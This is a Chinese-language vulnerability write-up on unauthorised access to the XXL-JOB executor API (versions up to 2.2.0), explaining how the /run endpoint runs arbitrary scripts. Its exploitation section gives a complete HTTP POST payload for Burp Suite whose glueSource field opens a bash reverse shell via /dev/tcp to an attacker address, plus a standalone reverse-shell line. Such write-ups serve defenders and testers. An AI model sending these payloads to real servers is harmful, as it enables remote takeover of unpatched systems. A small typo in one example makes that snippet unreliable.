- XXL-JOB -

XXL-JOB executor未授权访问漏洞

XXL-JOB executor未授权访问漏洞

漏洞详情

XXL-JOB是一个轻量级分布式任务调度平台。默认情况下XXL-JOB的Restful API接口或RPC接口没有配置认证措施,未授权的攻击者可构造恶意请求,造成远程执行命令,直接控制服务器。

漏洞影响

XXL-JOB <= 2.2.0

漏洞分析

XXL-JOB的Restful API分为两种,一个 调度中心Restful API,一个 执行器Restful API。其中在执行器Restful API的任务触发声明中,发送请求的数据格式为:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
地址格式:
    {执行器内嵌服务跟地址}/run 	//也就是说为executor端的地址,ip:9999/run
 
Header: 
    XXL-JOB-ACCESS-TOKEN : {请求令牌} 	
 
请求数据格式如下,放置在 RequestBody 中,JSON格式: 
{ 
    "jobId":1, // 任务ID 
    "executorHandler":"demoJobHandler", // 任务标识 
    "executorParams":"demoJobHandler", // 任务参数 
    "executorBlockStrategy":"COVER_EARLY", // 任务阻塞策略,可选值参考   com.xxl.job.core.enums.ExecutorBlockStrategyEnum 
    "executorTimeout":0, // 任务超时时间,单位秒,大于零时生效 
    "logId":1, // 本次调度日志ID 
    "logDateTime":1586629003729, // 本次调度日志时间 
    "glueType":"BEAN", // 任务模式,可选值参考 com.xxl.job.core.glue.GlueTypeEnum 		"glueSource":"xxx", // GLUE脚本代码 
    "glueUpdatetime":1586629003727, // GLUE脚本更新时间,用于判定脚本是否变更以及是否需要刷新 
    "broadcastIndex":0, // 分片参数:当前分片 
    "broadcastTotal":0 // 分片参数:总分片 
} 
 
响应数据格式: 
    { "code": 200, // 200 表示正常、其他失败 "msg": null // 错误提示消息 }

其中”glueType”:”BEAN” 任务模式的选值如下

1
2
3
4
5
6
7
BEAN("BEAN", false, null, null),
GLUE_GROOVY("GLUE(Java)", false, null, null),
GLUE_SHELL("GLUE(Shell)", true, "bash", ".sh"), 
GLUE_PYTHON("GLUE(Python)", true, "python", ".py"), 
GLUE_PHP("GLUE(PHP)", true, "php", ".php"), 
GLUE_NODEJS("GLUE(Nodejs)", true, "node", ".js"), 
GLUE_POWERSHELL("GLUE(PowerShell)", true, "powershell", ".ps1");

也就是说我们可以从中任意选择一种脚本语言,然后在”glueSource”:”xxx”中插入相对应的脚本代码即可执行相对应的命令。

比如对方如果是linux系统的服务器,那么就可以构造反弹shell命令执行代码为:

1
2
"glueType":"GLUE_SHELLl"
"glueSource":"/bin/bash / -i >& /dev/tcp/ip/port 0>&1"

漏洞利用

访问XXL-JOB存在漏洞版本的客户端(executor),利用burpsuite发送如下payload:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
POST /run HTTP/1.1
Host: ip:9999
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 394
 
{
  "jobId": 1,
  "executorHandler": "demoJobHandler",
  "executorParams": "demoJobHandler",
  "executorBlockStrategy": "COVER_EARLY",
  "executorTimeout": 0,
  "logId": 1,
  "logDateTime": 1586629003729,
  "glueType": "GLUE_SHELL",
  "glueSource": "/bin/bash -i >& /dev/tcp/192.168.30.1/5555 0>&1",
  "glueUpdatetime": 1586699003758,
  "broadcastIndex": 0,
  "broadcastTotal": 0
}

image

开启监听后,即可反弹回shell

image